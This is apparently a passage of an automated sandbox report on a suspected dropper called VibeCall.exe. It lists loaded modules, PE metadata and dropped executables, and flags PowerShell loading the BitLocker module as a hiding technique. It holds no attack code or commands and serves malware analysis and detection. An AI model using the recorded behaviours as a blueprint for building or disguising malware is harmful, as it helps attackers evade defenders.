                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\VibeCall.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: VibeCall.exeStatic PE information: certificate valid
                      Source: VibeCall.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: VibeCall.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: VibeCall.exeStatic file information: File size 71219064 > 1048576
                      Source: VibeCall.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x61ac00
                      Source: VibeCall.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x17ca00
                      Source: VibeCall.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x172800
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: VibeCall.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wkernel32.pdb source: aisolution_vibecall_a.exe, 0000000E.00000003.2441501280.0000000003BE0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441359757.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: aisolution_vibecall_a.exe, 0000000E.00000003.2442071082.0000000003CE0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441848134.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000F.00000003.2479874720.0000000003C80000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: aisolution_vibecall_a.exe, 0000000E.00000003.2440187618.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2440417244.0000000003CB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: aisolution_vibecall_a.exe, 0000000E.00000003.2440806354.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441027923.0000000003C60000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: aisolution_vibecall_a.exe, 0000000E.00000003.2440187618.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2440417244.0000000003CB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: aisolution_vibecall_a.exe, 0000000E.00000003.2440806354.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441027923.0000000003C60000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: aisolution_vibecall_a.exe, 0000000E.00000003.2442071082.0000000003CE0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441848134.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 0000000F.00000003.2479874720.0000000003C80000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: aisolution_vibecall_a.exe, 0000000E.00000003.2441501280.0000000003BE0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000E.00000003.2441359757.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: VibeCall.exe, 00000000.00000000.1698594920.00007FF735F42000.00000002.00000001.01000000.00000003.sdmp
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: VibeCall.exeStatic PE information: section name: .CLR_UEF
                      Source: VibeCall.exeStatic PE information: section name: .didat
                      Source: VibeCall.exeStatic PE information: section name: Section
                      Source: VibeCall.exeStatic PE information: section name: _RDATA
                      Source: soundsolution_vibecall_c.exe.0.drStatic PE information: section name: .fptable
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B35D2A5 pushad ; iretd 2_2_00007FFD9B35D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B542316 push 8B485F92h; iretd 2_2_00007FFD9B54231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B470D20 push eax; retf 4_2_00007FFD9B470D4D
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_013D19B4 push ecx; ret 14_3_013D19C7
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_01644D5E push esi; ret 14_3_01644D69
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_016421DC push eax; ret 14_3_016421DD
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_01642C39 push ecx; ret 14_3_01642C59
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_016428EC push edi; ret 14_3_016428F8
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_016410F9 push FFFFFF82h; iretd 14_3_016410FB
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_016444F9 push edx; retf 14_3_016444FC
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_01640F6A push eax; ret 14_3_01640F75
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_01643FD4 push ss; retf 14_3_01643FF5
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_01643F89 push edi; iretd 14_3_01643F96
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_0164525D push es; ret 14_3_01645264
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_2_01640F6A push eax; ret 14_2_01640F75
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_2_01644D5E push esi; ret 14_2_01644D69
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_2_01643FD4 push ss; retf 14_2_01643FF5
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_2_016421DC push eax; ret 14_2_016421DD
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_2_01643F89 push edi; iretd 14_2_01643F96
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_2_0164525D push es; ret 14_2_01645264
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_2_01642C39 push ecx; ret 14_2_01642C59
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_2_016428EC push edi; ret 14_2_016428F8
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_2_016410F9 push FFFFFF82h; iretd 14_2_016410FB
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_2_016444F9 push edx; retf 14_2_016444FC
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 15_3_016319B4 push ecx; ret 15_3_016319C7
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 15_3_02F2525D push es; ret 15_3_02F25264
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 15_3_02F23FD4 push ss; retf 15_3_02F23FF5
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 15_3_02F23F89 push edi; iretd 15_3_02F23F96
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 15_3_02F20F6A push eax; ret 15_3_02F20F75
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 15_3_02F210F9 push FFFFFF82h; iretd 15_3_02F210FB
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 15_3_02F244F9 push edx; retf 15_3_02F244FC
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\Downloads\soundsolution_vibecall_c.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\Downloads\videosolution_vibecall_b.exeJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
